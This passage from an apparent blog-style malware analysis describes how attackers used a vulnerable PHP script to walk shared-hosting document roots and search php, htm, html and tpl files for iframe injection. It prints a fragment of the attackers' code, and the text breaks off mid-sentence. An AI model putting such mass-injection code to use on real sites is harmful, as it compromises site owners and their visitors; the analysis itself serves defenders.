Once attackers found a vulnerable PHP script they first detected the directory hierarchy on the web site. In case of the sample PHP script , it looked like this:
for ($i = 3; $i < 500; $i++) {
if ($i == 438) continue;
flush_buffer('/home/sites/site' . $i . '/web:
');
iframe_account(array('/home/sites/site' . $i . '/web'));
}
From the code snippet above, you can see that all sites have their document root directory set as /home/sites/site[number]/web. The loop creates an array which is then passed to another function called iframe_account().
This function takes every director and performs a recursive search for 4 file types:
$file_types = array('php', 'htm', 'html', 'tpl');
It then opens the files and searches for the “
0 comments:
Post a Comment